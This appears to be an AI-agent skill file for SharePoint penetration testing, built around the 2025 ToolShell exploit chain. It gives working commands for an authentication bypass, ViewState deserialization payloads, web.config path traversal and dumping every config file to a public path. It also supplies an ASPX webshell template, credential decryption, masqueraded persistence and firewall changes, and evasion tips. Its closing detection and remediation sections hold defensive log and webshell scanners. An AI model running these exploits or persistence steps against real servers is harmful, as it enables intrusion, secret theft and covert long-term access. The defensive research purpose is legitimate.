Hacktricks-skills sharepoint-pentest

How to enumerate, exploit, and post-exploit Microsoft SharePoint environments. Use this skill whenever the user mentions SharePoint, IIS, ASP.NET web applications, ViewState exploitation, or needs to assess SharePoint security. Make sure to use this skill for any SharePoint-related security assessment, vulnerability testing, or incident response involving SharePoint servers, even if they don't explicitly mention 'SharePoint' but describe IIS/ASP.NET environments with _layouts or _vti_bin paths.

Install

Source: clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

Manifest: skills/network-services-pentesting/pentesting-web/microsoft-sharepoint/SKILL.MD

Source content

SharePoint Pentesting & Exploitation

⚠️ AUTHORIZED USE ONLY - This skill is for authorized security assessments, penetration testing, and incident response. Always have written authorization before testing any system.

This skill covers practical techniques to enumerate, exploit, and post-exploit Microsoft SharePoint (on-premises) environments. SharePoint is built on ASP.NET/IIS, so classic web attack surfaces apply, plus hundreds of proprietary endpoints that dramatically expand the attack surface.

Quick Start

# 1. Enumerate the target
./scripts/sharepoint-enumerate.sh <target-host>

# 2. If vulnerable, generate exploit payloads
python3 scripts/sharepoint-viewstate-forgery.py --help

# 3. Extract configuration files post-exploitation
./scripts/sharepoint-config-extractor.sh <target-path>

1. Enumeration

1.1 Identify SharePoint

Check for SharePoint-specific indicators:

# Favicon hash and keywords
curl -s https://<host>/_layouts/15/images/SharePointHome.png
curl -s https://<host>/_vti_bin/client.svc | file -  # Returns WCF/XSI

# Version leakage (often in JavaScript)
curl -s https://<host>/_layouts/15/init.js | grep -i "spPageContextInfo"

# Check for vulnerable ToolPane endpoint
curl -s -I https://<host>/_layouts/15/ToolPane.aspx

1.2 Enumerate Standard Paths

# Interesting standard paths to check
/_layouts/15/ToolPane.aspx               # Vulnerable page in 2025 exploit chain
/_vti_bin/Lists.asmx                     # Legacy SOAP service
/_catalogs/masterpage/Forms/AllItems.aspx
/_vti_bin/owssvr.dll
/_vti_bin/soap.dll

1.3 Enumerate Sites & Site Collections

# Requires at least Anonymous access
python3 Office365-ADFSBrute/SharePointURLBrute.py -u https://<host>

2. The 2025 Exploit Chain (ToolShell)

2.1 CVE-2025-49704 – Code Injection on ToolPane.aspx

/_layouts/15/ToolPane.aspx?PageView=…&DefaultWebPartId=<payload> allows arbitrary Server-Side Include code injection that gets compiled by ASP.NET.

Attack pattern:

  1. Inject C# code via the DefaultWebPartId parameter
  2. Code executes Process.Start() and drops malicious ViewState
  3. Leads to server-side code execution

2.2 CVE-2025-49706 – Authentication Bypass

The same page trusts the X-Forms_BaseUrl header to determine site context. By pointing it to /_layouts/15/, MFA/SSO enforced at the root site can be bypassed unauthenticated.

Bypass technique:

curl -X POST https://<host>/_layouts/15/ToolPane.aspx \
  -H "X-Forms_BaseUrl: https://<host>/_layouts/15/" \
  -H "Referer: https://<host>/_layouts/15/" \
  -d "<payload>"

2.3 CVE-2025-53770 – ViewState Deserialization → RCE

Once you control a gadget in ToolPane.aspx, post an unsigned (or MAC-only) __VIEWSTATE value that triggers .NET deserialization inside w3wp.exe.

If signing is enabled:

  1. Steal ValidationKey/DecryptionKey from web.config (see 2.4)
  2. Forge payload with ysoserial.net or ysodom

# Generate ViewState payload
ysoserial.exe -g TypeConfuseDelegate -f Json.Net -o raw -c "cmd /c whoami" | \
  ViewStateGenerator.exe --validation-key <hex> --decryption-key <hex> -o payload.txt

2.4 CVE-2025-53771 – Path Traversal / web.config Disclosure

Send a crafted Source parameter to ToolPane.aspx to return targeted files:

# Extract web.config
curl "https://<host>/_layouts/15/ToolPane.aspx?Source=../../../../web.config"

# Extract other config files
curl "https://<host>/_layouts/15/ToolPane.aspx?Source=../../../../ApplicationHost.config"

What you get:

  • <machineKey validationKey="…" decryptionKey="…"> → forge ViewState/ASPXAUTH cookies
  • Connection strings & secrets
  • Application configuration

2.5 ToolShell Workflow (Observed in Ink Dragon Intrusions)

  1. Header spoofing for auth bypass - POST to /_layouts/15/ToolPane.aspx with fake X-Forms_BaseUrl and Referer headers
  2. Serialized gadget in same request - Body includes attacker-controlled ViewState/ToolPart data
  3. Internet-scale scanning - Enumerate every reachable ToolPane.aspx endpoint
  4. Immediate staging - Drop loader or PowerShell stager that:
     • Dumps every web.config
     • Plants ASPX webshell for contingency access
     • Schedules local Potato privesc to escape IIS worker

3. Post-Exploitation

3.1 Exfiltrate All Config Files

# Variation 1: Batch extract all .config files
cmd.exe /c for /R C:\inetpub\wwwroot %i in (*.config) do @type "%i" >> "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug_dev.js"

The resulting debug_dev.js can be downloaded anonymously and contains all sensitive configuration.

3.2 Deploy ASPX Web Shell

# Variation 2: Base64-encoded deployment
powershell.exe -EncodedCommand <base64>

Shell template:

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Security.Cryptography" %>
<script runat="server">
    protected void Page_Load(object sender, EventArgs e){
        Response.Write(MachineKey.ValidationKey);
        // echo secrets or invoke cmd
    }
</script>

Write location:

C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

3.3 Decrypt Protected Configuration

Once on the web tier, decrypt protected sections:

# Decrypt connectionStrings
aspnet_regiis.exe -px "connectionStrings" C:\temp\conn.xml -pri

# Decrypt appSettings
aspnet_regiis.exe -px "appSettings" C:\temp\settings.xml -pri

This reveals SQL logins, SMTP relays, and custom service credentials.

3.4 Lateral Movement Patterns

  1. Recycle app-pool accounts - Many enterprises reuse IIS APPPOOL\SharePoint across farms
  2. Test credentials - Use decrypted credentials over SMB/RDP/WinRM to sibling servers
  3. Abuse leaked machineKey values - Reusing validationKey/decryptionKey allows lateral ViewState exploitation between internal SharePoint zones

3.5 Persistence Patterns

Scheduled tasks:

# One-shot task (often missed by telemetry)
schtasks /create /tn "SYSCHECK" /ru SYSTEM /sc once /st <hh:mm> /tr "<payload>"

Masqueraded services:

# Services like WindowsTempUpdate, WaaSMaintainer
sc create "WindowsTempUpdate" binPath="<malicious-path>" start=auto

Firewall downgrades:

# Permissive outbound rule masquerading as Defender
netsh advfirewall firewall add rule name="Microsoft MsMpEng" dir=out action=allow program="C:\ProgramData\Microsoft\Windows Defender\MsMpEng.exe" enable=yes profile=any

4. Detection & Evasion

4.1 What Defenders See

  • Header anomalies - Unusual X-Forms_BaseUrl values
  • ViewState patterns - Unusually large or malformed ViewState parameters
  • File access - Access to web.config via ToolPane.aspx
  • Process spawning - w3wp.exe spawning cmd.exe or powershell.exe
  • Network - DNS TXT record queries (AK47C2 variant), unusual outbound connections
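As an added defensive example (not part of the original skill), the following Python flags the indicators above in IIS W3C log lines: the ToolPane.aspx POST with a /_layouts/15/ Referer, the Source= traversal toward web.config, and fetches of the staged debug_dev.js / spinstall0.aspx files. The sample log lines are constructed, the field order is assumed to be IIS's default #Fields layout, and because X-Forms_BaseUrl is a custom header that IIS does not log by default, the logged Referer is used as its nearest proxy.

```python
import re
from urllib.parse import unquote

# Default IIS W3C extended field order (assumed; align with your server's #Fields line).
FIELDS = ("date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username "
          "c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status "
          "time-taken").split()
TRAVERSAL = re.compile(r"\.\./|\.\.\\|%2e%2e", re.I)
STAGED_FILES = {"debug_dev.js", "spinstall0.aspx"}   # artefacts named in section 3

def parse_line(line):
    """Split one W3C log line into a dict keyed by FIELDS; None if the column count differs."""
    parts = line.split()
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None

def classify(entry):
    """Return the ToolShell indicator names matching this request (empty list = nothing seen)."""
    hits = []
    stem = entry["cs-uri-stem"].lower()
    query = unquote(entry["cs-uri-query"]).lower()
    referer = unquote(entry["cs(Referer)"]).lower().rstrip("/")
    if stem.endswith("/_layouts/15/toolpane.aspx"):
        # Auth-bypass pattern: POST whose Referer (and X-Forms_BaseUrl, if logged) points at /_layouts/15/
        if entry["cs-method"] == "POST" and referer.endswith("/_layouts/15"):
            hits.append("toolpane-post-layouts-referer")
        # Disclosure pattern: Source= carrying traversal sequences or a .config file name
        if "source=" in query and (TRAVERSAL.search(query) or ".config" in query):
            hits.append("toolpane-source-traversal")
    if "/_layouts/" in stem and stem.rsplit("/", 1)[-1] in STAGED_FILES:
        hits.append("staged-artefact-request")
    return hits

def scan(lines):
    """Yield (line, indicators) for each parseable, non-directive line with at least one hit."""
    for line in lines:
        entry = None if line.startswith("#") else parse_line(line)
        if entry:
            hits = classify(entry)
            if hits:
                yield line, hits

# Constructed sample log (not real traffic): one benign request, then the three attack stages.
SAMPLE_LOG = r"""#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-20 10:01:02 10.0.0.5 GET /sites/hr/Forms/AllItems.aspx - 443 CORP\alice 10.0.1.9 Mozilla/5.0 https://sp.example/sites/hr 200 0 0 120
2025-07-20 10:01:07 10.0.0.5 POST /_layouts/15/ToolPane.aspx - 443 - 198.51.100.7 python-requests/2.31 https://sp.example/_layouts/15/ 200 0 0 340
2025-07-20 10:01:09 10.0.0.5 GET /_layouts/15/ToolPane.aspx Source=../../../../web.config 443 - 198.51.100.7 python-requests/2.31 - 200 0 0 55
2025-07-20 10:01:15 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 198.51.100.7 curl/8.4 - 200 0 0 30""".splitlines()
```

Run `scan()` over a real log after adjusting FIELDS to the server's #Fields line; the three constructed attack lines each produce exactly one indicator and the benign line none.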

4.2 Evasion Techniques

  • Obfuscation - Single-letter variable names, Thread.Sleep() for timing-based AV bypass
  • DLL side-loading - Place malicious DLL next to legitimate executables (e.g., 7z.exe)
  • Masquerading - Use legitimate Windows component names for services and firewall rules
  • Chunked communication - Split long queries across multiple requests

5. Remediation

5.1 Immediate Actions

  1. Patch immediately - Apply Microsoft security updates for CVE-2025-49704/49706/53770/53771
  2. Rotate machineKey - Change validationKey/decryptionKey in web.config
  3. Audit app-pool accounts - Ensure unique credentials per server
  4. Review scheduled tasks - Check for persistence mechanisms
  5. Scan for webshells - Look for suspicious .aspx files in _layouts directories
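One way to carry out step 5, as an added example that is not part of the original skill: walk a LAYOUTS directory for .aspx files and score them against the behaviours the shell template in section 3.2 exhibits (inline server-side script, MachineKey/secret disclosure, process spawning, request-driven execution). The signature set, the two-hit threshold and the sample pages written to a temporary directory are all constructed for this example.

```python
import os
import re
import tempfile

# Behaviours of the shell template in section 3.2, each as one signature (constructed set).
SIGNATURES = {
    "inline-server-script": re.compile(r'<script[^>]*runat\s*=\s*"server"', re.I),
    "machinekey-access":    re.compile(r"\bMachineKey\b|validationKey|decryptionKey", re.I),
    "process-spawn":        re.compile(r"Process\.Start|\bcmd(\.exe)?\b|powershell", re.I),
    "request-driven":       re.compile(r"\bRequest\s*(\[|\.Form|\.QueryString|\.Headers)", re.I),
}

def inspect_file(path):
    """Return the signature names found in one .aspx file (unreadable file -> empty list)."""
    try:
        with open(path, encoding="utf-8", errors="ignore") as fh:
            text = fh.read()
    except OSError:
        return []
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan_layouts(root, min_hits=2):
    """Walk root for .aspx files; return {path: hits} for files with at least min_hits signatures.
    Requiring two hits keeps stock pages with a lone server-side block out of the results."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".aspx"):
                path = os.path.join(dirpath, name)
                hits = inspect_file(path)
                if len(hits) >= min_hits:
                    findings[path] = hits
    return findings

def build_sample_tree():
    """Create a constructed LAYOUTS directory: one benign page, one page shaped like the shell template."""
    root = tempfile.mkdtemp(prefix="layouts_")
    benign = ('<%@ Page Language="C#" MasterPageFile="~/_layouts/15/simple.master" %>\n'
              '<asp:Content ContentPlaceHolderID="PlaceHolderMain" runat="server">Settings</asp:Content>\n')
    shell = ('<%@ Page Language="C#" %>\n<script runat="server">\n'
             'protected void Page_Load(object sender, EventArgs e){\n'
             '    Response.Write(MachineKey.ValidationKey); // echo secrets or invoke cmd\n}\n</script>\n')
    with open(os.path.join(root, "settings.aspx"), "w") as fh:
        fh.write(benign)
    with open(os.path.join(root, "spinstall0.aspx"), "w") as fh:
        fh.write(shell)
    return root
```

Point `scan_layouts()` at the real TEMPLATE\LAYOUTS directory and review every reported path by hand, since unusual but legitimate customisations can also trip two signatures.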

5.2 Long-term Hardening

  1. Disable anonymous access - Where possible
  2. Implement WAF rules - Block suspicious ViewState patterns
  3. Monitor _layouts endpoints - Alert on unusual access patterns
  4. Segment SharePoint - Limit lateral movement opportunities
  5. Regular credential rotation - Especially for app-pool accounts

6. References

7. Related Skills

  • IIS post-exploitation & web.config abuse
  • ASP.NET ViewState exploitation
  • .NET deserialization attacks
  • Windows privilege escalation (Potato variants)
  • DLL side-loading techniques